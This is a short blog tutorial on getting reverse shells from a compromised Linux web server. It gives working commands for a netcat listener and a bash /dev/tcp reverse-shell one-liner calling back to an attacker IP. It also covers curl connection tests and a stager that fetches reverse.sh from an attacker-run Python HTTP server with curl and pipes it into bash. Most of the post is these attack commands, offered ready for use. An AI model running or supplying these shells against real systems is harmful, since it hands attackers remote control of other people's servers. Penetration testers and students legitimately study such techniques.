Sometimes we may want to spawn a reverse shell from the server we have just pawned especially a Linux web server. It seems trouble to generate a payload from msfvenom. Therefore, here is some easy bash-based reverse shell.
Setting up a listening port for incoming TCP connection
We can use netcat to listen to incoming TCP connections from the pwned server.
// Usage $ nc -lnvp <port> // Example $ nc -lnvp 7337 listening on [any] 7337 ...
Based on the example above, our system will listen for incoming connections at port 7337.
Note that if you are running your system in a virtual machine, remember to configure your IP address and port forwarding if you are using NAT. To save yourself from having that hassle, use a bridge adapter instead.
To create a reverse TCP shell via Bash:
// Usage /bin/bash -c 'bash -i >& /dev/tcp/<Your IP>/<Your listening port> 0>&1' // Example /bin/bash -c 'bash -i >& /dev/tcp/10.10.1.1/7337 0>&1'
There are also many other reverse shells that can be received via our listening netcat by pentestmonkey which can be found here.
Reverse shell troubleshoot
There are also situations where none of the reverse shells works. To ensure that no firewall is affecting it and is just parsing issue of our reverse script code at the server-side, we can use CURL to test it:
// Usage curl <your ip>:<your listening port> // Example curl 10.10.1.1:7337
If no firewall or other factors is stopping outgoing connection, your netcat should receive incoming connection as shown below:
$ nc -lvp 7337 listening on [any] 7337 ... 192.168.1.2: inverse host lookup failed: Unknown host connect to [10.10.1.1] from (UNKNOWN) [192.168.1.2] 29727 GET / HTTP/1.1 Host: 10.10.1.1:7337 User-Agent: curl/7.58.0 Accept: */*
Therefore, we can try to create a payload stager concept by using CURL to get a shell script, pipe the content of the shell script into bash to create a reverse shell.
In the shell script, reverse.sh:
bash -i >& /dev/tcp/10.10.1.1/7337 0>&1
Inside the same directory as the reverse.sh, launch a Python server:
$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Remember to continue to run your netcat listener at port 7337 or any other port you specified.
Next, change the CURL to this (note that we are using CURL to port 8000 as our http.server from Python3 is listening for incoming connection to send file via HTTP at port 8000):
curl 10.10.1.1:8000/reverse.sh | bash
This way, CURL will fetch reverse.sh file from our system at port 8000 from our Python3 http.server, pipe the content of reverse.sh into bash which will then be executed by that bash. Thus, our netcat should be able to receive incoming connections at port 7337, obtaining an interactive reverse shell.
I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂